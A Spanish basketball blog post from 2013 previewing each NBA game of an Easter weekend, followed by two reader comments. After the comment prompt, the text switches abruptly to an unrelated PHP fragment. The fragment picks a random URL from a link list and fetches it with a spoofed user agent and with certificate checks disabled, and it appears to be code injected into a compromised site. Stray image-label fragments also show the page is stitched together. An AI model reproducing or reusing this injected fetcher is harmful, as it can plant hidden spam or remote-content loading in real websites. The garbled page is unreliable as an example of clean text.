Fin de semana: la Pasión

29 de March de 2013 por MagicJohnson32

Como sois gente de Fe, seguro que no aprovecharéis la Semana Santa para iros de vacaciones a latitudes donde la tentación aceche a la vuelta de cada esquina. De acuerdo, ha acabado la Cuaresma, el periodo tradicionalmente dedicado a la contrición y la penitencia, pero eso no os da licencia para pecar. Así que os quiero a todos encerrados en casa, viendo NBA y comentándola aquí. Vamos, como un fin de semana cualquiera.

cp tpHay mucho en lo que fijarse: la reacción de los Heat tras su primera derrota desde el Pleistoceno; la cada vez más competida lucha por el liderato del Oeste entre Spurs y Thunder y por la segunda posición del Este entre Knicks y Pacers; la cada vez más patética lucha por la octava plaza entre Lakers, Jazz y Mavs; el reecuentro de Calde con ‘sus’ Raptors; el espectáculo asegurado del ‘John Wall Show’; partidazos tremendos como el Clippers-Spurs o el Spurs-Heat…

Como diría alguien con más gusto por el tópico que imaginación: sería un pecado perdérselo.

¡Ah, y recordad adelantar vuestros relojes una hora en la madrugada del sábado al domingo!

VIERNES

  • Wizards @ Magic (0h00): el principal interés en el único partido que empieza a la medianoche es ver si John Wall se cobra otra víctima tras sus recientes exhibiciones. Los Magic acumulan ocho derrotas seguidas y están a un paso de presentar el peor récord de todos los equipos, pero de manera inteligente están dando carrete a sus jóvenes talentos. Webster y Ariza regresan para los capitalinos.
  • Raptors @ Pistons (0h30): el partido entre dos de los peores conjuntos de las últimas semanas servirá como primer reencuentro entre Calderón y el que hasta hace poco había sido su único equipo en la NBA.
  • Sixers @ Cavs (0h30): como en los dos partidos anteriores, tampoco habrá nada en juego en la visita a Cleveland de los Sixers, que parecen recuperarse con un gran Spencer Hawes pero cedieron demasiado terreno para pensar en los Playoffs.
  • Bobcats @ Knicks (0h30): la visita de Charlotte Bobcats al Madison se produce en el mejor momento en muchos meses para los colistas, que han ganado tres de sus últimos cinco partidos. Otro tanto puede decirse de los Knicks, que de hecho son el único equipo que ha ganado sus últimos seis partidos.
  • Hawks @ Celtics (0h30): el buzzer beater de Jeff Green en Cleveland evitó la séptima derrota seguida de los Celtics, que hoy pueden confirmar su recuperación y volver a aspirar a algo más que la séptima plaza si ganan a los Hawks, actualmente sextos. Al Horford, que estaba en un gran estado de forma, será baja.
  • Heat @ Hornets (1h00): una vez acabada la famosa racha, los Heat se centran en nuevos objetivos. Una victoria en New Orleans (o una derrota de los Knicks) les aseguraría el primer puesto del Este, aunque los Heat no han logrado vencer a los Hornets a domicilio en las seis últimas ocasiones. Se rumoreaba que LeBron podría descansar pero finalmente se vestirá de corto. No lo hará Chalmers, tocado del tobillo.
  • Rockets @ Grizzlies (1h00): un duelo de estilos radicalmente opuestos se disputará en Memphis, en un partido al que ambos equipos llegan con ciertas urgencias. Los Grizzlies han de reaccionar para seguir el paso de Nuggets y Clippers, y los Rockets buscan abrir una brecha definitiva respecto de los Lakers y el resto de perseguidores.
  • Thunder @ Wolves (1h00): primero contra último de la división NorthWest. Los Thunder, decididos a dar caza a los Spurs por el liderato del Oeste, visitan una pista propicia. Y lo harán pendientes de lo que suceda en el partidazo que se iniciará sólo media hora más tarde en San Antonio.
  • Clippers @ Spurs (1h30): se ven las caras los dos mejores bases de la temporada y en sus manos probablemente quedará la suerte de sus respectivos equipos, con permiso de Tim Duncan, Blake Griffin y compañía. Es el partido de la noche y un posible anticipo de una eliminatoria de Playoffs.
  • Nets @ Nuggets (2h00): los Nuggets regresan a Denver tras ver cortada su extraordinaria racha con dos derrotas en New Orleans y San Antonio. En las alturas del Pepsi Center recibirán a un rival complicado, los Nets, que vienen completando una gira notable.
  • Jazz @ Blazers (3h00): el último tren de los Blazers por seguir en la carrera por los Playoffs pasa por vencer a uno de los candidatos, los Jazz, que han ganado dos partidos seguidos y con una nueva victoria alcanzarían a los Lakers y recuperarían así la octava plaza. Para complicar más las cosas para Portland, LaMarcus Aldridge es duda.
SÁBADO
  • Bulls @ Mavs (19h00): en este sorprendente horario para un sábado se disputa un partido crucial para las aspiraciones de los Mavericks. Los Bulls esperan recuperar para entonces a Belinelli y -sobre todo- a Joakim Noah, aunque ya dieron buena prueba ante los Heat de que son peligrosos en cualquier circunstancia.
  • Magic @ Hawks (0h00): posiblemente sin Horford ni Vucevic, puede que lo más atractivo de este encuentro sea el choque entre dos prodigios físicos como Tobias Harris y Josh Smith. En cualquier caso, victoria obligada para los Hawks.
  • Bobcats @ Sixers (1h00): Charlotte y Philly son dos de los equipos más lastimosos de 2013, aunque recientemente ambos han mejorado su rendimiento. Nada en juego salvo la honrilla.
  • Grizzlies @ Wolves (1h00): el encuentro entre amigos, Marc vs Ricky, debería de resolverse en favor del pívot, si es que Gasol sigue aguantando la dolorosa lesión abdominal que parecía que le iba a mantener lejos de las pistas durante semanas.
  • Clippers @ Rockets (1h00): los angelinos completan un brutal back-to-back texano. Si la batalla del viernes en el Álamo no fuese suficiente reto, han de conservar las piernas para uno de los equipos que más corren de la liga. Los Lakers rezan por una victoria de sus vecinos.
  • relojThunder @ Bucks (1h30): con Ibaka y Sanders virtualmente empatados como máximos taponadores de la liga, Thunder y Bucks se enfrentan en Milwaukee, donde la victoria sobre los Lakers ha calmado unas aguas que bajaban revueltas por el choque entre Jennings y Boylan.
  • RECORDATORIO: a las 2h00 del sábado hay que adelantar el reloj una hora.
  • Nets @ Jazz (3h00): Deron Williams visita Salt Lake City, motivo más que suficiente para prestar atención a lo que suceda en el EnergySolutions Arena. Además, los Nets se juegan su preciada cuarta plaza y los Jazz buscan regresar a posiciones nobles.
  • Pacers @ Suns (4h00): los Suns han iniciado la operación tanking de una manera tan descarada que incluso se han alzado voces de protesta entre la plantilla. Los Pacers no dudarán en sacar provecho de ello. Si Lindsay Hunter sigue “dando descanso” a Dragic, no creo que los Suns lleguen a 70 puntos ante la mejor defensa de la liga.
  • Lakers @ Kings (4h00): en el último capítulo del libro “Las desventuras de los Lakers”, Kobe Bryant y Steve Nash acabaron lesionados el partido ante los Bucks. El escolta -ya sabemos cómo se las gasta- jugará salvo que tengan que amputarle una pierna, pero la ausencia del base es más probable. Los Kings han ganado dos seguidos y ya vencieron a los angelinos en las tres últimas visitas de los Lakers a Sacramento.
  • Blazers @ Warriors (4h30): el Damian Lillard vs Steph Curry es uno de los alicientes del enfrentamiento que cerrará la jornada del sábado. Los Blazers pueden hacer frente al quinteto de los Warriors, pero no tienen respuesta posible ante la segunda unidad que encabezan Jack y Landry.
DOMINGO
  • Cavs @ Hornets (0h00): dos equipos sin aliciente alguno por ganar partidos y con la mente puesta ya en el próximo draft.
  • Raptors @ Wizards (0h00): ver descripción del partido anterior.
  • Pistons @ Bulls (1h00): hubo un tiempo en el que un Pistons @ Bulls era un partido excelente con todo el sabor de los clásicos. Y entonces Dumars traspasó a Billups a cambio de Iverson.
  • Heat @ Spurs (1h00): sensacional encuentro, uno de los mejores partidos de baloncesto que se pueden ver hoy en día, y que puede devolver a los Heat el aura de invencibles que llegaron a adquirir durante la racha de victorias. Es posible que de aquí salga el equipo con el mejor balance de la regular season.
  • Celtics @ Knicks (1h30): tal vez quede eclipsado por el partido que se disputa en San Antonio media hora antes, pero el Madison acoge otro excelente enfrentamiento, en este caso entre dos de las potencias del Este (menos potencias por culpa de las lesiones, especialmente en el caso de los Celtics).
Comenta

2 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Soy yo (y mi visor desde el movil) o faltan los del sabado y el domingo?

      Citar

  2. MagicJohnson32 dice:
    #2

    Jose Luis:
    Soy yo (y mi visor desde el movil) o faltan los del sabado y el domingo?

    No, no era cosa tuya. Se ha hecho un poco tarde, así que he publicado cuando tenía hecho el viernes. Ahora ya la he actualizado con el finde completo 😉

    Por cierto, pedazo de fin de semana de NBA que tenemos por delante.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>